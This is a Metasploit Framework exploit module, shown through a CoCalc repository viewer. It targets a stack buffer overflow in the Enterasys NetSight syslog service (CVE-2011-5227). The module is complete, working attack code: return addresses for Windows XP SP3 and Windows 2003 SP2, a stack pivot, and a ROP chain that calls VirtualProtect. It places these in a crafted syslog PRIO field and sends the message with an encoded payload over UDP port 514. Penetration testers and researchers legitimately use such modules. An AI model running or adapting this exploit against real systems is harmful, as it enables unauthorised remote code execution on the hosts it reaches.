Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Enterasys NetSight nssyslogd.exe Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in Enterasys NetSight. The

18
          vulnerability exists in the Syslog service (nssylogd.exe) when parsing a specially

19
          crafted PRIO from a syslog message. The module has been tested successfully on

20
          Enterasys NetSight 4.0.1.34 over Windows XP SP3 and Windows 2003 SP2.

21
        },

22
        'Author' => [

23
          'Jeremy Brown', # Vulnerability discovery

24
          'rgod <rgod[at]autistici.org>', # Vulnerability discovery

25
          'juan vazquez' # Metasploit module

26
        ],

27
        'References' => [

28
          ['CVE', '2011-5227'],

29
          ['OSVDB', '77971'],

30
          ['BID', '51124'],

31
          ['ZDI', '11-350']

32
        ],

33
        'Payload' => {

34
          'BadChars' => "\x00",

35
          'Space' => 3000,

36
          'DisableNops' => true,

37
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [

42
            'Enterasys NetSight 4.0.1.34 / Windows XP SP3',

43
            {

44
              'Offset' => 43,

45
              'Ret' => 0x77c4e444 # ADD ESP,30 # POP EDX # RETN # from msvcrt

46
            }

47
          ],

48
          [

49
            'Enterasys NetSight 4.0.1.34 / Windows 2003 SP2',

50
            {

51
              'Offset' => 43,

52
              'Ret' => 0x77bdf444 # ADD ESP,30 # POP EDX # RETN # from msvcrt

53
            }

54
          ]

55
        ],

56
        'Privileged' => true,

57
        'DisclosureDate' => '2011-12-19',

58
        'DefaultTarget' => 1,

59
        'Notes' => {

60
          'Reliability' => UNKNOWN_RELIABILITY,

61
          'Stability' => UNKNOWN_STABILITY,

62
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

63
        }

64
      )

65
    )

66


67
    register_options([ Opt::RPORT(514) ])

68
  end

69


70
  def junk(n = 4)

71
    return rand_text_alpha(n).unpack("V")[0].to_i

72
  end

73


74
  def nop

75
    return make_nops(4).unpack("V")[0].to_i

76
  end

77


78
  def get_stackpivot

79
    stack_pivot = ''

80
    case target.name

81
    when /Windows XP SP3/

82
      stack_pivot << [0x77c4e448].pack("V") # ret

83
      stack_pivot << [0x77c4e448].pack("V") # ret

84
      stack_pivot << [0x77c4e448].pack("V") # ret

85
      stack_pivot << [0x77c4e448].pack("V") # ret

86
      stack_pivot << [0x77c4e444].pack("V") # ADD ESP,30 # POP EDX # RETN

87
    when /Windows 2003 SP2/

88
      stack_pivot << [0x77bdf448].pack("V") # ret

89
      stack_pivot << [0x77bdf448].pack("V") # ret

90
      stack_pivot << [0x77bdf448].pack("V") # ret

91
      stack_pivot << [0x77bdf448].pack("V") # ret

92
      stack_pivot << [0x77bdf444].pack("V") # ADD ESP,30 # POP EDX # RETN

93
    end

94
    return stack_pivot

95
  end

96


97
  def get_payload

98
    my_payload = ''

99


100
    case target.name

101
    when /Windows XP SP3/

102
      jmp_esp = [0x77c35459].pack("V")

103
      my_payload << jmp_esp

104
    when /Windows 2003 SP2/

105
      rop_gadgets =

106
        [

107
          0x77bb2563, # POP EAX # RETN

108
          0x77ba1114, # <- *&VirtualProtect()

109
          0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN

110
          junk,

111
          0x77bb0c86, # XCHG EAX,ESI # RETN

112
          0x77bc9801, # POP EBP # RETN

113
          0x77be2265, # ptr to 'push esp #  ret'

114
          0x77bb2563, # POP EAX # RETN

115
          # 0x03C0990F,

116
          0x03c09f0f,

117
          0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0xb00 -> ebx)

118
          0x77bb48d3, # POP EBX, RET

119
          0x77bf21e0, # .data

120
          0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN

121
          0x77bbfc02, # POP ECX # RETN

122
          0x77bef001, # W pointer (lpOldProtect) (-> ecx)

123
          0x77bd8c04, # POP EDI # RETN

124
          0x77bd8c05, # ROP NOP (-> edi)

125
          0x77bb2563, # POP EAX # RETN

126
          0x03c0984f,

127
          0x77bdd441, # SUB EAX, 03c0940f

128
          0x77bb8285, # XCHG EAX,EDX # RETN

129
          0x77bb2563, # POP EAX # RETN

130
          nop,

131
          0x77be6591, # PUSHAD # ADD AL,0EF # RETN

132
        ].pack("V*")

133
      my_payload << rop_gadgets

134
    end

135


136
    my_payload << payload.encoded

137
    return my_payload

138
  end

139


140
  def exploit

141
    connect_udp

142


143
    prio = "<"

144
    prio << rand_text_alpha(19)

145
    prio << get_stackpivot

146
    prio << rand_text_alpha(4)

147
    prio << [target.ret].pack("V")

148
    prio << ">"

149


150
    message = prio

151
    message << rand_text_alpha(9 + (15 - Rex::Socket.source_address(datastore['RHOST']).length)) # Allow to handle the variable offset due to the source ip length

152
    message << get_payload

153


154
    print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")

155
    udp_sock.put(message)

156


157
    disconnect_udp

158
  end

159
end

160


161